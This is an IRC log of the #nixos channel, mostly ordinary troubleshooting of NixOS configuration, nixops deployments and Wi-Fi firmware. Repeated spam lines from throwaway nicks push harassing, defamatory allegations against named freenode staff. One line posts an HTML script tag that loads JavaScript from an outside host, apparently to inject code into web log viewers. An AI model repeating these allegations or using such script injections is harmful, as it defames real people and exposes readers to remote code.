<sdx236> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<sdx236> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
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<omarty> Hi, is there a quick way to filter unsupported packages from my systemPackages? Like matching host platform with meta.plaftorms.
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<RyanKnack4> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<RyanKnack4> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<RyanKnack4> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
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<{^_^}> [nixpkgs] @globin merged pull request #44093 → grafana: 5.2.1 -> 5.2.2 → https://git.io/fNRhC
<{^_^}> [nixpkgs] @globin pushed commit from @WilliButz to master « grafana: 5.2.1 -> 5.2.2 »: https://git.io/fN0fq
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<matti> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<poxifide9> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<poxifide9> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<poxifide9> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
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<{^_^}> [nixpkgs] @benley opened pull request #44094 → bazel: 0.15.1 -> 0.15.2 → https://git.io/fN0Tf
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<Guest78591> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<Guest78591> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<Guest78591> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
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<{^_^}> [nixpkgs] @nand0p opened pull request #44095 → httperf: init at 0.9.1 → https://git.io/fN0Tc
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<coconnor> morning all
<d1rewolf_> coconnor, morning ;)
<infinisil> srk: I'll probably add a ,manual command, usable like ",manual python" & co., in the future for that
<srk> infinisil: would need metadata in docs or something like that
<srk> I've looked up these two quite often so shortcut is handy :D
<infinisil> Yea, I'll hopefully come up with something smart when implementing it
<srk> we should also add https://github.com/Gabriel439/haskell-nix to ,haskell
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<srk> ,haskell
<coconnor> Anyone know why GTK apps in my KDE environment seem to be missing icons?
<srk> aa
<infinisil> srk: Or a link to a wiki article might be better in the future
<coconnor> Not all icons. Only some icons.
<jD91mZM2> coconnor: Hmmm I think I got the same thing
<jD91mZM2> Not on KDE
<jD91mZM2> What is $GDK_PIXBUF_MODULE_FILE set to?
<coconnor> checking... I did notice the gnome3 session sets up quite a few env vars
<coconnor> /nix/store/5c1v11kv9d5582blr1lqrjrglyrwq732-librsvg-2.42.4/lib/gdk-pixbuf-2.0/2.10.0/loaders.cache
<coconnor> hrm
<jD91mZM2> oof, that seems correct
<coconnor> librsvg only?
<jD91mZM2> I'm not sure what's happening. Maybe some icons are missing from the theme - falling back to adwaita. Is adwaita installed?
<coconnor> or is that an aggregate of some type?
<jD91mZM2> I don't really know what all this means myself
<jD91mZM2> Got to go, sorry
<coconnor> haha no worries! that's a nice clue anyways
<coconnor> the "defaultIconTheme" is installed. checking what that is
<|Leary> Could be unlinked shares?
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<{^_^}> [nixpkgs] @alyssais opened pull request #44096 → pythonPackages.potr: 1.0.1 -> 1.0.2 → https://git.io/fN0LY
<coconnor> I'm liking share and etc/gconf
<coconnor> err linking
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<if`m> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<coconnor> trying to add one bit at a time of nixpkgs/nixos/modules/services/x11/desktop-managers/gnome3.nix
<coconnor> see if one of those env vars or packages fixes the issue
<coconnor> Tho, if so, then I don't think the magic should be stuck only in gnome3.nix
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<{^_^}> [nixpkgs] @benley opened pull request #44097 → bazel: fix bash completion, halve build time → https://git.io/fN0L2
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<{^_^}> [nixpkgs] @alyssais opened pull request #44098 → gem-config: fix capybara-webkit on Darwin → https://git.io/fN0Ld
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<{^_^}> [nixpkgs] @alyssais opened pull request #44099 → gem-config: add libxml2-ruby → https://git.io/fN0tm
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* gchrist`recovery sends a low bandwidth wave
<{^_^}> [nixpkgs] @alyssais opened pull request #44100 → gem-config: add zookeeper → https://git.io/fN0tB
<{^_^}> [nixpkgs] @DeltaEvo opened pull request #44101 → scrcpy: init at 1.2 → https://git.io/fN0tg
<d1rewolf_> srk goibhniu: turns out the nixpkgs manual on python shows how to install packages very easily from configuration.nix. as simple as: (python2.withPackages(ps: with ps; [pycurl]))
<d1rewolf_> I wonder why the wiki doesn't show this extremely easy step?
<goibhniu> nice! sorry, I thought you were trying to work around nixpkgs using pip
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<d1rewolf_> goibhniu, the only reason I was going down that path is I wasn't sure where to put the python-with-my-packages code shown on the wiki
<d1rewolf_> I tried getting it to work but couldn't. however, the above fixed it ;)
<goibhniu> the wiki isn't official ... so it's always good to check the manuals first
<jD91mZM2> coconnor: What icon theme is configures in your GTK/QT settings?
<d1rewolf_> much cleared in the nixpkgs manual, but I guess they pretty much end up being the same thing.
<d1rewolf_> goibhniu, isn't official? you mean it's maintained by someone other than the nixos maintainers?
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<goibhniu> exactly
<d1rewolf_> oh, wow. I had no idea
<lfish> hello, I'm trying to develop an app that uses bluetooth to connect with an arduino and I have no idea where to start. I can pair the device with bluetoothctl but I can't connect it, and I don't know what interface I should use. Any resource to get me started?
<coconnor> jD91mZM2: hicolor
<d1rewolf_> of course, I'd never gone to the main page: "Welcome to the unofficial user's wiki" ;)
<coconnor> switching to adwaita for all options
<cocreature> d1rewolf_: the good part about this is that you can be the one that improves the wiki :)
<d1rewolf_> cocreature, yep ;)
<coconnor> jD91mZM2: hm! that did help a lot.
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<coconnor> looks like hicolor is either broken on this system or missing so many icons to be useless. interesting
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<infandum> I'm trying to follow https://stackoverflow.com/questions/48733553/import-unstable-and-inherit-config in order to mix stable and unstable packages, but I'm getting "attribute 'versionBranch' missing, and it points to the boot.loader.efi.canTouchEfiVariables = true; line.
<clever> infandum: can you gist your entire configuration.nix file?
<d1rewolf_> what's the nixos equivalent of ubuntu's service command?
<d1rewolf_> or has that be phased out for systemd?
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<Denommus> is this configuration ok to host a static webserver in nginx? https://gist.github.com/Denommus/3e88cce1ebeb7dcb8a0cc65401c8c8ca
<d1rewolf_> nixos' default vim has some sort of setting where, when you try to select text with the mouse, it turns on vim's visual mode. I'd like to disable this. anyone know what the setting is?
<{^_^}> [nixpkgs] @alyssais opened pull request #44102 → weechat: seperate weechat-unwrapped from wrapper → https://git.io/fN0mq
<clever> d1rewolf_: just google "vim disable mouse"
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<clever> it will need to be added to ~/.vimrc
<samueldr> d1rewolf_: it would be systemctl, from systemd
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<d1rewolf_> clever, samueldr: thanks guys
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<d1rewolf_> clever, yeah, I should google more. set mouse= works. thx
<srk> :set mouse=
<srk> :)
<d1rewolf_> srk, with visual mode enabled, do you know how to yank to the x clipboard? I tried "*y but no luck
<srk> oooh, I don't use this thing
<Denommus> nixops is trying to stop -.slice
<d1rewolf_> srk, no worries ;)
<d1rewolf_> off to google
<srk> d1rewolf_: like I've had to use vimx for it to work previously, I just pass :set nonu and copy stuff with mouse when needed
<srk> mostly use splits tho
<clever> srk: you can :tabe to make a new tab without splits
<pie_> can anyone recommend any guides on setting up software raid 1?
<clever> and it can edit the same file in several buffers
<srk> yeah
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<d1rewolf_> I notice that the default tor install doesn't have a systemd service. is there a separate package for this or does none exist?
<clever> d1rewolf_: services only happen when you enable nixos modules, installing things can never create a service
<clever> infandum: line 14 makes no sense at all, thats in the let block still
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<gregf> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
<gregf> or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/
<gregf> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
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<d1rewolf_> clever, hmmm....ok. so a systemd file will never be installed by installing things? just by turning on the service in the config?
<d1rewolf_> clever, what's the appropriate way to search for nixos modules from the command line?
<clever> d1rewolf_: `man configuration.nix`
<d1rewolf_> clever, but man configuration.nix, and then /tor, will find a LOT of false positives
<clever> d1rewolf_: its almost always in services, so /services.tor
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<d1rewolf_> clever, that works. thanks
<clever> infandum: can you also pastebin the error?
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<Denommus> anyone knows how to fix this nixops error? https://i.imgur.com/jf5J1e4.png
<Denommus> it's driving me nuts
<infandum> clever: Otherwise it says that the enableGoogleTalkPlugin is already defined
<Denommus> I don't know why it's trying to stop -.slice, I feel like it shouldn't
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<clever> infandum: you want to put it inside the pkgsConfig
<clever> infandum: and then you can strip the nixpkgs.config from it
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<madknight> i guess there is a good reason to it, why are nix builds stored in a mono repo and not managed like the arch user repository, where each package has its own git?
<infandum> clever: Okay, it's in pkgsConfig now, but that did not solve the original versionBranch issue
<clever> infandum: can you pastebin the original error?
<d1rewolf_> is there a list of commercial users of nixos to parade in front of pointy haired bosses?
<infandum> clever: error: attribute 'versionBranch' missing, at /nix/store/r2j.../nixos/pkgs/development/libraries/glib/default.nix:52:42
<infandum> It's a bit hard as I'm on another computer
<clever> infandum: thats line 52 of glib, not line 52 of configuration.nix
<clever> infandum: your override to change things like gdm is breaking things
<{^_^}> [nixpkgs] @ttuegel merged pull request #44091 → buildMaven: Check for authenticated attribute → https://git.io/fNR71
<{^_^}> [nixpkgs] @ttuegel pushed 2 commits to master: https://git.io/fN0Yd
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<clever> d1rewolf_: iohk.io is also using nixos heavily
<d1rewolf_> clever, perfect. thx. wish they'd add a list to nixos.org
<d1rewolf_> wow...that's a hell of a visualizaton on that site
<clever> yeah
<d1rewolf_> thought I'd eaten the wrong brownie for a second :)
<d1rewolf_> or the *right* one
<clever> d1rewolf_: now click the thing in the bottom right, and select complexity is beutiful
<semihonest> Does anyone know what's up with nixos-unstable-small not updating, despite passing on hydra?
<d1rewolf_> wow
<d1rewolf_> bottom left on my screen, but still. wow ;)
<clever> oops, yeah, bottom left
<srk> yeah, that visualization is epic!
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<Yoda9> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<Denommus> where can I see the output of my nginx configuration?
<{^_^}> [nixpkgs] @matthewbauer merged pull request #43810 → bfs: enable the test_fstype test → https://git.io/fNnKZ
<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fN03W
<Myrl-saki> Okay... I feel stupid now.
<Myrl-saki> EXISTENT=[ "$(/nix/store/dqrvvzzcdzishra1dk5rxv2jh3fh5jda-nixops/bin/nixops list | grep builder | cut -d\| -f3 | sed 's/^\s*//;s/\s*$//')" = builder ]
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<Myrl-saki> I guess that's more of a Bash script than anything, OTOH, I'm pretty sure a lot of people here are great with Bash. :P
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<Myrl-saki> builder: command not found
<clever> heh
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<clever> Myrl-saki: i have a trick to solve this need for bash, one min
<clever> at least on the nix derivation side
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<srk> Denommus: systemctl status nginx
<d1rewolf_> what's the easiest cloud provider to get nixos running on?
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<clever> Myrl-saki: you give this function a chunk of haskell code that creates a $out, and it runs it, no more bash to deal with!
<clever> d1rewolf_: aws is pretty simple
<d1rewolf_> clever, ah, there's an aws image? nice
<srk> clever: :D with turtle and some small lib that could be nice
<Myrl-saki> clever: I guess that's one way to solve it. :P
<clever> d1rewolf_: nixops has aws support, so you just make a .nix file that describes your cluster of nixos machines, and hit deploy
<clever> d1rewolf_: then nixops will use the aws api to automatically create all the VM's and deploy your config to them
<d1rewolf_> clever, ah......wow.
<d1rewolf_> yes..just yes
<clever> d1rewolf_: ive used that to spin up another 60 machines in just a few hours before
* d1rewolf_ stands and slow claps
<d1rewolf_> ;)
<srk> so much power!
<srk> :D
<d1rewolf_> srk, you ain't kidding
<srk> not at all
<{^_^}> [nixpkgs] @matthewbauer merged pull request #43048 → passff-host: init at 1.0.2 → https://git.io/fbp00
<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fN036
<srk> :]
<srk> like with nixops you can have an app deployed over multiple clouds within minutes
<clever> d1rewolf_: https://gist.github.com/cleverca22/7ae0ee0847b3da2150d22ee63175dbad is a dummy file left-over from when i was testing something
<clever> d1rewolf_: this file creates a single vm, and allows ssh to it
<clever> and absolutely nothing is installed
<clever> d1rewolf_: https://github.com/cleverca22/nixos-configs/blob/master/deployments/house.nix this one doesnt use aws, but it manages my NAS and router within the house
<clever> you are free to mix non-cloud and cloud things in the same file if you choose to
<Myrl-saki> [ $(/nix/store/dqrvvzzcdzishra1dk5rxv2jh3fh5jda-nixops/bin/nixops list | grep builder | cut -d\| -f3 | sed 's/^\s*//;s/\s*$//') = blargh ] && export EXISTENT=true || export EXISTENT=false
<Myrl-saki> This one works. Sadly.
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<d1rewolf_> clever, perfect. thank you
<clever> d1rewolf_: so i could have an AWS based backup server defined in house.nix, and auto-backup my nas/router to it, if i wanted to
<Myrl-saki> clever: Have you tried shelly?
<clever> Myrl-saki: nope
<d1rewolf_> d1rewolf, that's awesome. I look forward to being proficient in nix syntax
<Myrl-saki> clever: It's a shell, but in Haskell.
<clever> Myrl-saki: ah, ive used turtle a bit
<goibhniu> d1rewolf_ have you seen https://nixcloud.io/tour/ already?
<Denommus> ok, if I restart my virtual machine after the deployment things seem to run
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<Myrl-saki> clever: Also, remember the time I was talking about automatic deployment of nixops? :P
<Myrl-saki> Err, automatic deployment of nixops for nix-build
<d1rewolf_> goibhniu, I haven't
<Myrl-saki> export PATH=${nix-build-wrap}/bin${"\${PATH:+:\${PATH}}"}
<Myrl-saki> ${nixops}/bin/nixops "$@"
<d1rewolf_> goibhniu, wait...actually I started that
<d1rewolf_> on my first day with nix
<clever> Myrl-saki: id also put nixops into PATH to make the commandline shorter
<Myrl-saki> clever: This Nix script is called twice, from the top-level, and from the nix-build-2rap.
<d1rewolf_> I should probably revisit it now ;)
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<infandum> clever: Fantastic, everything is fixed, thank you! However, is there a way to use the unstable gdm?
<clever> infandum: you may need to update glib as well to make things happy
<Myrl-saki> clever: The nixops top-level calls the nix-build-wrap, which calls the nixops-with-normal-nix-build.
<Myrl-saki> clever: :D
<clever> > lib.makeBinPath [ nix nixops ]
<{^_^}> "/nix/store/rbvqani25sypvz5j6hdzbhafpmkhnv1l-nix-2.0.4/bin:/nix/store/c00x8z5c334xkv73qg1cvf159078h8wv-nixops-1.6/bin"
<clever> Myrl-saki: this function may also interest you
<Myrl-saki> Oh...
<Myrl-saki> Thanks. :D
<clever> > lib.makeLibraryPath [ xorg.libX11 ]
<{^_^}> "/nix/store/rnmr8ns7n76ch8wp9sabpkd660j3m01c-libX11-1.6.5/lib"
<clever> it also has a lib variant
hotfuzz_ is now known as hotfuzz
<Myrl-saki> clever: I was actually looking for the same thing for Python.
<Myrl-saki> I just went for "${x.out}/lib/python3.6/site-packages"
* Myrl-saki shrugs
<Myrl-saki> I just learned recently I can make that more generic with python${x.pythonModule.majorVersion}
<Myrl-saki> Or something like that.
<clever> > python.sitePackages
<{^_^}> "lib/python2.7/site-packages"
<madknight> For which NixOS branch do I have to open a Pull Request in order to add a new Haskell library?
<Myrl-saki> Um...
<clever> Myrl-saki: there is an attribute that tells you what the suffix is
<Myrl-saki> clever: Thanks. <.<
<clever> madknight: usually master
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<clever> > lib.makeSearchPath "a" [ hello ]
<{^_^}> "/nix/store/aq3byv8z9ax5zqbqi5b73q06yq8gfl99-hello-2.10/a"
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<cocreature> nixos should pick up libs on hackage automatically
<clever> madknight: can you see how this would work?
<Myrl-saki> myrl@myrl:~/Dev/skynet[flask-admin••]$ nix eval nixpkgs.pythonPackages.emoji.pythonModule.sitePackages
<Myrl-saki> "lib/python2.7/site-packages"
<Myrl-saki> :D
<cocreature> (or rahter nixpkgs)
<clever> madknight: hackage-packages.nix is auto-generated from hackage
<madknight> clever, ah my package is on hackage
<clever> madknight: then it should just appear automatically next time the file is regenerated
<madknight> clever, so it will be automatically added soon?
<clever> Sonarpulse: *poke*
<mightybyte> How do I get around the "warning: ignoring untrusted substituter" error when I specify a substituter on the commanhd line?1
<__monty__> Is it generated from hackage or stackage?
<madknight> clever, perfect thx
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<clever> mightybyte: you have to be listed as a trusted user in /etc/nix/nix.conf to specify your own substituters
<mightybyte> Ahh, ok.
<Sonarpulse> clever: pong
<clever> mightybyte: and at that point, i would just add the substituter to nix.conf
<cocreature> __monty__: for packages in stackage, the version number comes from stackage but it adds all packages on hackage. it just choses the newest version by default for other packages
<Denommus> I've opened an issue with my problem: https://github.com/NixOS/nixops/issues/985
<{^_^}> nixops#985 (by Denommus, open): VirtualBox: nixops under Arch tries to stop -.slice, which fails
<mightybyte> clever: I'm doing this on Travis.
<clever> Sonarpulse: madknight has a new package on hackage and i was wondering how often hackage-packages.nix updates?
<clever> mightybyte: ah, one min
<Sonarpulse> clever: on discourse peti mentioned a cron job
<Sonarpulse> but that is for unstable
<Sonarpulse> and i think the regeneration too
Guest2436 is now known as bollu
<d1rewolf_> I'm curious...why does nixos-generate-config place grub settings in configuration.nix instead of hardware-configuration.nix? It seems to make much more sense in the hardware config?
<clever> mightybyte: -- echo "binary-caches = https://cache.nixos.org https://hydra.iohk.io" | sudo tee -a /etc/nix/nix.conf
<mightybyte> Ahh, nice.
<mightybyte> clever: Is it "binary-caches" or is it "substituters"?
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<clever> mightybyte: nix2 renamed the option to substituters
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<mightybyte> ok
<clever> mightybyte: the travis file i grabbed the above from was deleted in jan, we switched to buildkite
<clever> > lib.makeSearchPath python.sitePackages [ hello nix ]
<{^_^}> "/nix/store/aq3byv8z9ax5zqbqi5b73q06yq8gfl99-hello-2.10/lib/python2.7/site-packages:/nix/store/rbvqani25sypvz5j6hdzbhafpmkhnv1l-nix-2.0.4/lib/python2.7/site-packages"
<clever> Myrl-saki: ^^^
<mightybyte> clever: Interesting. How have you liked buildkite?
<clever> d1rewolf_: you generally need to change the grub settings, and nixos-generate-config is designed to be re-ran again in the future, and it will overwrite hardware-configuration.nix
<clever> mightybyte: much more control over the build capacity, never stuck in a queue and unable to do anything about it
<clever> mightybyte: it also has support for windows (though we dont use it), so you could get win/linux/mac all on buildkite if you wanted
<mightybyte> Nice
<clever> mightybyte: but if all your doing is nix-build, hydra is a better option
<d1rewolf_> clever, it's meant to be re-ran? really? in what context?
<Myrl-saki> clever: Holy crap.
<Myrl-saki> clever: That's... amazing.
<mightybyte> clever: hydra is nigh unto impossible in my exeperience.
<clever> d1rewolf_: you can mount a new disk anywehre you want, and re-run nixos-generate-config to update hardware-configuration.nix to match the new hardware config
<clever> Myrl-saki: makeBinPath and makeLibPath just pass "bin" or "lib" to makeSearchPath
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<d1rewolf_> clever, interesting. but in my case, since I had to modify hardware-configuration.nix to support encrypted LUKS....perhaps I need to put the LUKS settings in a different file and include it from hardware-configuration.nix?
<clever> d1rewolf_: just put the luks stuff in configuration.nix
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<rej29> Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/
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<clever> d1rewolf_: there is no real difference between the 2 files, they just get merged together automatically
<clever> d1rewolf_: the only real difference is that nixos-generate-config will silently overwrite one of them
<d1rewolf_> clever, yeah, I suspect I've been placing too many generic cross-machine settings in configuration.nix. I'll have to break those out
<clever> d1rewolf_: what i do, is i put the bare-minimum required to boot into configuration.nix, and then i do imports = [ ./nixcfg/hostname.nix ];
<clever> d1rewolf_: nixcfg is a git repo, and each machine has its own hostname.nix that acts as an entry point
<clever> and all of the hostname.nix's have imports = [ ./core.nix ];
<d1rewolf_> clever, it's meant to be re-ran? really? in what context?pas
<d1rewolf_> woops. sorry
<d1rewolf_> clever, cool. I'm forking your repo for later review ;)
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<Myrl-saki> clever: Yeah.
<Myrl-saki> clever: Thanks. I actually had a line dedicated to doing what makeSearchPath is doing lol
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<Ankhers> https://gist.github.com/ankhers/d21dfcdbaf4b7b75169b434e955b616f -- Could anyone tell me why I am getting "unexpected '.', at test-all.nix:5:46"?
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<clever> Ankhers: inherit doesnt take dots like that
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<clever> Ankhers: you probably want { inherit (beam.packages) erlangR20; }
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<Ankhers> clever: Thanks. Now I'm getting an "unexpected argument 'erlangR20'".
<clever> Ankhers: why are you trying tp pass that to test.nix?
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<clever> Ankhers: can you add test.net to the gist?
<Ankhers> I'm trying to come up with something that can test all supported versions for a lib I am writing. Something similar to travis, but I can run locally. Sure, one sec.
<Ankhers> clever: updated.
<clever> Ankhers: test.net only accepts 3 arguments, stdenv, erlang, and rebar3
<clever> Ankhers: so you can only pass one of those 3 in the {} after callPackage
<clever> you probably want { erlang = beam.packages.erlangR20; } then
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<Ankhers> clever: Thanks! I think that has put me on the right path.
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<andi-> hmpf, anyone else using `st` with `neomutt`? I know it sounds strange but my st crashes with an xlib error whenever I scroll down in my emails... m(
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<d1rewolf_> why does it seem there are a lot of haskell programmers using nixos? Is it because of its functional nature?
<iqubic> Yes indeed.
<__monty__> It's just because haskell, nix and haskell programmers are lazy.
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<fresheyeball> I would like to extend that string in my configuration.nix
<fresheyeball> is there an approach for that?
<clever> fresheyeball: you need to use mkForce to overwrite systemd.services.hoogle.serviceConfig
<fresheyeball> clever: I have never heard of mkForce
<fresheyeball> can you elaborate?
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<__monty__> mk the Force be with you.
<clever> fresheyeball: systemd.services.hoogle.serviceConfig = lib.mkForce { .... };
<clever> that lets you forcibly change any nixos option
<fresheyeball> clever: I don't see how that works, how can I still refer to ${hoogleEnv} ?
<clever> fresheyeball: its in a let block, so you cant
<clever> fresheyeball: youll need to copy its definition over to configuration.nix
<fresheyeball> aww
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<Ankhers> clever: beam.packages.erlangR20 is a set. I would think the `inherit (beam.package) erlangR20` shold have worked. And then the callPackage function pulls the erlang and rebar versions from there?
<fresheyeball> copy pasta? that sucks
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<Ankhers> Or am I misunderstanding callPackage?
<clever> Ankhers: `inherit (beam.package) erlangR20` is just `erlangR20 = beam.package.erlangR20` and test.net wont accept a erlangR20 param
<clever> fresheyeball: another option is to just change out the whole module
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<countingsort> when i want to install firefox but not compile everything myself, i should do firefox-bin, is that how it works?
<fresheyeball> clever: what do you mean by that? Just write it myself?
<clever> fresheyeball: if you use disabledModules correctly, then nixos will just entirely ignore the services/development/hoogle.nix in your channel
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<clever> fresheyeball: you can then copy that file to /etc/nixos/, edit it however you want, and imports = [ ./hoogle.nix ]; to load the new version
<clever> countingsort: the nixos binary cache should provide a pre-compiled copy of firefox
<fresheyeball> clever: that seems like too much work just to pass the --home flag to hoogle
<countingsort> clever: weird. started compiling everything, i stopped it at spidermonkey
<clever> countingsort: what is the content of /etc/nix/nix.conf ?
<clever> fresheyeball: you can also file a PR to nixpkgs to fix hoogle.nix
<fresheyeball> clever: that sounds better
<clever> fresheyeball: you can use disabledModules to test out the hoogle.nix changes, before you make that PR
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<countingsort> clever: what part of it? i havnt touched it, substituters says cache.nixos.org and theres also a trusted public key for it
<clever> countingsort: have you changed your version of nixpkgs any?
<fresheyeball> clever: I think I will have to even after the pr
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<countingsort> clever: how do i do that? new to nixos, pretty much just installed it
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<abueide> hey guys so i bought a pau06 wireless adapter which is plug and play on arch linux and why i bought it so i can install via live usb, but its not creating a network interface on it with minimal nixos
<clever> countingsort: can you pastebin the output of `nix-build '<nixpkgs>' -A firefox --dry-run` ?
<clever> countingsort: and also `nix-info`
<{^_^}> [nixpkgs] @NeQuissimus pushed 4 commits to master: https://git.io/fN0cX
<{^_^}> [nixpkgs] @NeQuissimus pushed to release-18.03 « linux: 4.4.143 -> 4.4.144 »: https://git.io/fN0cD
<abueide> lsusb shows Ralink Technology, Corp. RT5372 Wireless Adapter
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<{^_^}> [nixpkgs] @NeQuissimus pushed to release-18.03 « linux: 4.9.114 -> 4.9.115 »: https://git.io/fN0c9
<abueide> is it not included on nixos live usb?
<abueide> if so how do I get it on there?
<{^_^}> [nixpkgs] @NeQuissimus pushed to release-18.03 « linux: 4.14.57 -> 4.14.58 »: https://git.io/fN0cd
<{^_^}> [nixpkgs] @NeQuissimus pushed to release-18.03 « linux: 4.17.9 -> 4.17.10 »: https://git.io/fN0cp
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<countingsort> clever: https://ptpb.pw/Cry-
<abueide> how would I do this on a live usb? i can't edit the configuration file on it
<abueide> hardware.enableAllFirmware = true;
<abueide> hardware.enableRedistributableFirmware = true;
<abueide> boot.kernelModules = [ "rt2800usb" ];
<countingsort> for the first one
<clever> abueide: you can still freely edit /etc/nixos/configuration.nix and nixos-rebuild switch
<abueide> it says it is readonly
<clever> abueide: ls -l /etc/nixos/configuration.nix
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<abueide> do i have to edit it before i boot from it?
<samueldr> clever: since it was copied from the store when generating the installer, it kept the r-------- attributes
<countingsort> clever: for nix-info: https://ptpb.pw/dVsq
<clever> abueide: try to chmod +w the file first
<samueldr> abueide: if using vim, :w! will force write it, you could otherwise chmod +w it
<clever> countingsort: ahh, 32bit, hydra doesnt pre-compile a 32bit firefox
<clever> countingsort: is the cpu 32bit only?
<countingsort> yes
<countingsort> its like 10 years old
<clever> countingsort: then your only choice is to either compile firefox or switch to firefox-bin
<Ankhers> clever: Interesting. Thanks.
<countingsort> firefox-bin then, compiling would take ages
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<countingsort> so why tf is firefox-bin also trying to compile stuff
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<countingsort> :(
<clever> countingsort: what is it trying to compile?
<countingsort> clever: libbonobo atm
<Ankhers> clever: Thanks for the help! I got it working.
<{^_^}> [nixpkgs] @Fresheyeball opened pull request #44103 → Add Home option to Hoogle Server → https://git.io/fN0C5
<fresheyeball> clever: ^^
<clever> fresheyeball: it doesnt need a defaultText on that option
<clever> fresheyeball: thats only for when the default is a derivation, and you dont want that drv in the documents
<fresheyeball> clever: updated
<countingsort> clever: guess im compiling, thanks for your help
<abueide> clever, do i need to reboot after nixos-rebuild switch
<abueide> in order for the kernel module to be enabled
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<clever> abueide: no
<clever> abueide: the `switch` tells it to apply the changes without rebooting
<clever> abueide: and its a livecd, so all changes are lost at shutdown/reboot
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<{^_^}> [nixpkgs] @matthewbauer merged pull request #44073 → pyserial: fix build on Darwin → https://git.io/fNRU7
<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fN0WR
<abueide> yeah so it didn't work :( is the rt2800usb kernel module included on the live disk or do i have to download it with my nonexistent internet connection on the machine
<abueide> and will it set up the interface automatically?
<abueide> if it was
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<clever> abueide: it probably needs network access to get network access, it can be a pain to deal with that
<clever> abueide: if you have nixos on another machine, you can just format and nixos-install against the usb stick, then youll have a non-live install
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<abueide> why aren't the wifi firmwares enabled by default on the live usb
<clever> abueide: and then you can plug that usb stick into a machine that can get internet, change things, and nixos-rebuild
<clever> abueide: before we can answer that, we need to know which wifi drivers are missing
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<abueide> lsusb shows Ralink Technology, Corp. RT5372 Wireless Adapter
<samueldr> quickly looking, it seems to be a nonfree firmware
<clever> abueide: oh, and boot.kernelModules = [ "rt2800usb" ]; wont do anything to install it, all it does is try to load the driver
<clever> abueide: does lsmod | grep rt2800usb show anything?
<samueldr> (at least, that's how it's classified for debian)
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<clever> /nix/store/r4h3cbf952lqjakmm1d4rp72hzflq2a8-linux-4.14.54/lib/modules/4.14.54/kernel/drivers/net/wireless/ralink/rt2x00/rt2800usb.ko.xz
<clever> abueide: a quick check says its part of linux itself, so its not optional
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<clever> abueide: does dmesg say anything?
<clever> samueldr: yeah, the firmware is a seperate thing, and can be missing
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<abueide> what am I looking for? dmesg is long
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<clever> abueide: try doing `rmmod rt2800usb ; modprobe -v rt2800usb` then check dmesg again, it should have a new error at the bottom
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<abueide> when i do the command it says module rt2800usb is not enabled
<clever> not enabled or not loaded?
<abueide> not loaded*
<clever> abueide: then continue to the modprobe
<clever> [clever@amd-nixos:~/apps/nixpkgs]$ modinfo rt2800usb
<clever> firmware: rt2870.bin
<clever> ,locate rt2870.bin
<{^_^}> Found in packages: firmwareLinuxNonfree
<abueide> dmesg says usbcore: registered new interface driver rt2800usb <newline> usbcore: deregistering interface driver rt2800usb
<clever> abueide: and now `ip link` ?
<abueide> no interface still
<clever> abueide: any output about firmware?
<abueide> ok now i got it to not spit out the not loaded message and dmesg says last registered new interface driver rt2800usb but still no interface
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<labviking> Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate
<labviking> <script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>
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<clever> abueide: also, thats a 5372 card, and your using the 2800 driver
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<clever> abueide: try unplugging and replugging the usb device
<gchrist`recovery> so I had a terrible idea where it'd be cool if I could take a nix-shell and update my calling shell's env to matchits PATH ... but I can! hahaha
<gchrist`recovery> something like eval $(nix-shell ... --run env)
<ambro718> I see that stdenv.mkDerivation will set lots of environment variables for build tools like CC, CXX, LD, AR, AS, RANLIB... Is there a simple way to "rename" those to BUILD_*? I had a package that did it manually for CC and CXX which was enough at the time but this later broke when nixpkgs started setting more variables.
<abueide> clever, nothing in usb 3 or usb 2
<abueide> do i need to enable unfree in configuration.nix
<ambro718> (the reason is that I am cross-compiling something whose configure script would interpret these variables as cross-compile tools which they are not)
<infinisil> gchrist`recovery: Neat! And welcome back :)
<abueide> currently i just have this one line boot.kernelModules
<clever> abueide: nixos-rebuild would have given an error if you needed it
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<abueide> boot.kernelModules = [ "rt2800usb" ]; *
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<clever> abueide: is that even the right driver?
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<clever> abueide: what is the vid:pid pair for the device in lsusb?
<abueide> rt5372 is what it says in lsusb
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<abueide> 148f:5372
<clever> [clever@amd-nixos:~/apps/nixpkgs]$ modinfo rt2800usb | grep -i 148f --color | grep -i --color 5372
<clever> alias: usb:v148Fp5372d*dc*dsc*dp*ic*isc*ip*in*
<clever> yeah, that driver does claim to support the card
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<abueide> yeah its weird it worked perfect with arch without doing anything
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<clever> ls /run/current-system/firmware/rt2870.bin
<clever> abueide: does this show the firmware file?
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<abueide> clever, it does
<clever> ls /run/booted-system/firmware/rt2870.bin
<clever> abueide: and what about the booted-system?
